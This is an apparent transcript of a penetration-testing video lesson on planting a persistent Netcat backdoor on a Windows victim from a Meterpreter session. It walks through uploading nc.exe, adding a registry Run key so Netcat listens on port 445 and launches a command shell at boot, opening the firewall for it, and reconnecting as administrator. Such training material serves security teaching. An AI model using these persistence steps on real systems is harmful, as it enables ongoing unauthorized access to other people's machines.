Part 6 - Persistent Backdoor with NetCat

Now, we're going to go a little bit further. What I'm trying to do at this point is to create a backdoor. We have really seen some backdoors, but they're not persistent. It relies on the victim running a program, running a file, trying to put that into a place, and the system where to load every time they boot, for instance, would be a good technique. Trying to get a virus in the Master Boot Record, or somewhere else in the startup folder, perhaps, you can get that to run. But what I want to try to do in the meantime is use a tool called Netcat. Netcat is very useful because you can set up a listener on a victim's system, and pick a port number of your choice and pick a program that you'd like to run, and that lets you connect anytime you want to that system, assuming that Netcat is running. Netcat is included in the Metasploit framework, I should say.

‍

What I'm going to do is run the upload command. I think I've got this saved in my video. This is the path, user/share/windows-binaries/nc.exe. Notice, I'm using double backslashes, and I mentioned before,  there are some passing issues so double backslashes gets us around that problem. But what I want to do first is upload the Netcat executable to the Windows directory on the victim system. Can you see it? Let me do that because again, I am the system account. If you're not system, you won't be able to put the file in that directory, you have to try to put it somewhere else. But I want to run it from this directory because that's my first choice. Now, what we want to do is to edit a registry key so that we can get this program to run every time the system boots.

‍

From my Meterpreter shell, I need to type this in very carefully, HKLM\software\microsoft \windows\currentversion\run.  I'm missing one of my backslashes. As I said before, that will cause problems. There we go.  It's my VMware, a user process. I've got another command I need to run. I'm going to up arrow to bring back my last one. Instead of registering a num key, I'm going to run the set val command, and that should be HKLM\software\microsoft\ windows\currentversion\run.  Then I need to do a little bit after this. Netcat-d is the value that I'm setting in this key, and I'm going to give it the path to Netcat, nc.exe. Then I'm telling it which port I'd like the listener to run on, 445. Then run command.exe as the actual command when the listener is connected to. Now, I can query the value that I've just set. Get rid of all this. Then I'll change set val to query val. This lets me confirm that indeed, I have the right parameter set here. I'm running Netcat persistent.

‍

This is the path to it, listening port 445, and the command will be command.exe. Our next task is to go ahead and create the firewall so that we can allow this 445 traffic through. It's a lot of typing here. We're going to run nutshell advanced firewall, firewall module, and then we want to add a rule. We're going to call the rule Netcat just for now, that's fine. We'd have to specify several parameters here, but all this should make sense if you've worked with firewalls before. We're specifying the protocol as TCP, the local port is 445. Direction is inbound. The action is allow. The program that's being referenced is c:\Windows\system32\nc.exe. It's a lot of typing. Well, the reason that didn't work is because I'm not in a command shell. Hold on one second. Verify that I'm still system. Now, I can run that command. Give me my okay statement, show me that the firewall rule worked.

‍

Now, since I've put the registry key into this key, software\microsoft\windows\currentversion\run, that means that when I reboot the virtual machine, it should load that Netcat program listening on port 445. We'll go ahead, and pause so I can reboot. We lost our Meterpreter session which is expected when we reboot. I'm going to go ahead, and go to another command shell. Now, I'm going to see if my Netcat connection actually works. Netcats built into Kali, you don't need to specify its path. I'm going to use the verbose option.

‍

I'll give it the address of my victim system, and the port number. This might take a moment. There we go. It give me a message about inverse host lookup failure, that's fine. Who am I? I'm logged in as an administrator, which is good. Now, this is a persistent connection that I have to this system. Anytime I want to log in, I just simply use Netcat, and go to this port. Very cool. That's it for the Netcat section. Thank you.